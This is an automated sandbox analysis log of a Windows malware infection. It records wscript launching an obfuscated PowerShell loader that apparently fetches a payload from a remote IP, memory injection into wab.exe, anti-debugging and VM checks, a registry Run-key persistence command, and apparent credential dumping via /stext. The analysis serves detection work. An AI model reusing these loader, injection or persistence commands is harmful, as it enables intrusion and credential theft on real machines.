              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5887Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3891Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6884Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2901Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 1670Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.3 %
              Source: C:\Windows\System32\wscript.exe TID: 3384Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6884Thread sleep time: -6456360425798339s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2004Thread sleep count: 6884 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep count: 2901 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7704Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 1670 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WCN\en-GB\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\Jump to behavior
              Source: wscript.exe, 00000000.00000003.1629983948.000001ABE8815000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1629744110.000001ABE8821000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1629275988.000001ABE881F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1748995993.000001ABE8814000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746569290.000001ABE8814000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpQ
              Source: wscript.exe, 00000000.00000003.1747193609.000001ABE8893000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000003.1746224283.000001ABE6822000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wscript.exe, 00000000.00000003.1630136990.000001ABE88B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1629028077.000001ABE88B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1746569290.000001ABE88B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1749058600.000001ABE88B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000001.00000002.2627753604.000002B7C0971000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&e%SystemRoot%\system32\mswsock.dll,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slithJ~rIE;
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_14-33817
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00A4DAAC LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,5_2_00A4DAAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 44C0000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 323F8FCJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"Jump to behavior
